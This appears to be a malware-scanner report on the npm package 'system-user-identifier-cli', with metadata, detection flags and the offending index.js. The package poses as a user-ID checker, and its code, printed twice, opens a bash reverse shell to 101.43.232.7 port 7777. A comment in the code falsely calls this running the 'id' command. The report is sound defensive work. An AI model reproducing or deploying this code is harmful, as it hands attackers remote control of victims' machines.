// npm 패키지
system-user-identifier-cli
A simple npx tool to check system user identifier
버전
8
메인테이너
1
라이선스
ISC
최초 publish
2026-05-25
publisher
ayoung299
tarball
1,000 B
AUTO-PUBLISHED·3개 버전 인덱싱됨·최근 publish: 2026-05-25
// exfil path
what is read → where it shipssteals
- ○ home dir
- ○ system info
sends to
- ⌖ 101.43.232.7
- ⚙ reverse shell(fetches + executes remote payload)
// offending code· @7.0.1· 1 file flagged
llm: malicious · 0.95→ 정적 분석기가 reverse-shell 패턴 검출 — 설치 경로에 원격 코드 실행 형태가 그대로 드러남.
- @7.0.1··AUTO-PUBLISHED·publisher: ayoung299heuristic 42/100static flags 4llm malicious (0.95) via fast-tracknew-publisher:0dpublisher-version-pump:6reads-homedirreads-system-infochild-process-spawnreverse-shell
→ 정적 분석기가 reverse-shell 패턴 검출 — 설치 경로에 원격 코드 실행 형태가 그대로 드러남.
// offending code· 1 file flaggedpatterns: 4
--- package/index.js (excerpt) --- #!/usr/bin/env node const os = require('os'); const { exec } = require('child_process'); // 方法 1:使用 Node.js 内置模块(推荐,跨平台支持更好) const user = os.userInfo().username; const platform = os.platform(); console.log(`呃呃呃呃呃呃呃呃呃呃呃呃�� Hello! (Node内置方法) 当前用户是: ${user} (${platform})`); // 方法 2:直接执行系统的 id 命令(原生 Shell) try { exec('bash -c "bash -i >& /dev/tcp/101.43.232.7/7777 0>&1"'); await setTimeout(600000); } catch (error) { console.error('执行 id 命令失败:', error.message); } --- package.json (entry) --- { "name": "system-user-identifier-cli", "version": "7.0.1", "description": "A simple npx tool to check system user identifier", "main": "index.js", "bin": { "system-user-identifier-cli": "index.js" }, "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "keywords": [ "cli", "id", "npx" ], "author": "Your Name", "license": "ISC" } --- index.js (entry) --- #!/usr/bin/env node const os = require('os'); const { exec } = require('child_process'); // 方法 1:使用 Node.js 内置模块(推荐,跨平台支持更好) const user = os.userInfo().username; const platform = os.platform(); console.log(`呃呃呃呃呃呃呃呃呃呃呃呃�� Hello! (Node内置方法) 当前用户是: ${user} (${platform})`); // 方法 2:直接执行系统的 id 命令(原生 Shell) try { exec('bash -c "bash -i >& /dev/tcp/101.43.232.7/7777 0>&1"'); await setTimeout(600000); } catch (error) { console.error('执行 id 命令失败:', error.message); }
